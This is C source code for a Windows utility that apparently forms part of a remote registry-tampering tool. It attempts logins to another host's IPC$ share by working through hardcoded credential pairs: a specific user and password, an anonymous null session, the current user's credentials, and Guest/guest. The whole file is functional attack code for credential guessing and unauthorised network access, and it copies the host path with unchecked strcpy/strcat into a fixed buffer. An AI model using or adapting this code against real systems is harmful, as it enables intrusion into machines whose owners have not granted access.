#include <windows.h>
#include <stdio.h>
#include <assert.h>
#include "makeipc.pt"
#include "regwrite.pt"

/*
	This structure is a simple array of strings.  The even
	strings (0, 2, etc) are user names, and the odd ones are
	passwords.
*/
#define	NUM_DICT_ELEMENTS		sizeof(szDictionary)/sizeof(szDictionary[0])
LPCSTR	szDictionary[] =
{
	"caezar", "write",           // real user attempt
	"", "",                      // anonymous login
	NULL, NULL,                  // current local user name/pass
	NULL, "",                    // current local user name/no pass
	"Guest", "guest"             // guest login
};


/*
	ResAccessCheck

	This function will attempt a few different accesses to
	the passed LANMAN host's IPC$ device.  If successful,
	then we are guaranteed minimal registry access to that
	machine.

	Returns TRUE if access was granted, FALSE otherwise.
*/
BOOL ResAccessCheck( LPCSTR lpszHost, LPCSTR lpszDevice )
{
	int	nIndex;
	char	szResource[MAX_PATH];

	// set up a file name like \\SERVER\IPC$
	strcpy( szResource, lpszHost );
	strcat( szResource, lpszDevice );

	// if this machine already has IPC access, skip logging in.
	if( ResCurrentPrivelege( szResource ) )
		return TRUE;

	// loop through the dictionary
	for( nIndex=0; nIndex < NUM_DICT_ELEMENTS; nIndex +=2 )
	{
		// try this login pair (index, index+1)
		if( ResAccessLogin( szResource, szDictionary[nIndex], szDictionary[nIndex+1] ) )
		{
			return TRUE;
		}
	}

	// aw shit
	return FALSE;		
}

/*
	ResCurrentPrivilege

	This function checks the current privilege level of
	the passed device by attempting a simple file i/o to
	it.

	Returns TRUE if access was granted, FALSE otherwise.
*/
BOOL ResCurrentPrivelege( LPCSTR lpszResource )
{
	HANDLE	hPipe;

	assert( lpszResource );
	
	// try I/O access to the IPC device
	hPipe = CreateFile( lpszResource, GENERIC_READ|GENERIC_WRITE,
					0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL );
	
	// do we already have the needed access?
	if( hPipe == INVALID_HANDLE_VALUE )
	{
		printf( "Current privilege level was not accepted.\n" );
	
		return FALSE;
	}
	else
	{
		printf( "Current privilege level was accepted.\n" );
	
		CloseHandle( hPipe );

		return TRUE;
	}
}

/*
	ResAccessLogin

	This function attempts to attach to the passed device by
	performing a remote login using the passed user/pass pair.
	NULLs will use the currently logged in user/pass pair, and
	empty strings ("") will use *no* name and/or password.

	Returns TRUE if access was granted, FALSE otherwise.
*/
BOOL ResAccessLogin( LPCSTR lpszResource, LPCSTR lpszUser, LPCSTR lpszPassword )
{
	LPSTR			lpUser, lpPassword;
	NETRESOURCE	nr;

	assert( lpszResource );

	// set it up for simple login
	nr.dwType = RESOURCETYPE_ANY;
	nr.lpLocalName = NULL;
	(LPCSTR)nr.lpRemoteName = lpszResource;
	nr.lpProvider = NULL;

	// remember nice name
	if( lpszUser == NULL )
		lpUser = "<current local user>";
	else if( *lpszUser == '\0' )
		lpUser = "<anonymous>";
	else
		lpUser = (LPSTR)lpszUser;
	
	// remember nice password
	if( lpszPassword == NULL )
		lpPassword = "<current local password>";
	else if( *lpszPassword == '\0' )
		lpPassword = "<no password>";
	else
		lpPassword = (LPSTR)lpszPassword;
	
	// attempt the login
	if( WNetAddConnection2( &nr, lpszUser, lpszPassword, 0 ) == NO_ERROR )
	{
		printf( "Login attempt succeeded: %s, %s.\n", lpUser, lpPassword );

		return TRUE;
	}
	else
	{
		printf( "Login attempt failed: %s, %s.\n", lpUser, lpPassword );

		return FALSE;
	}
}
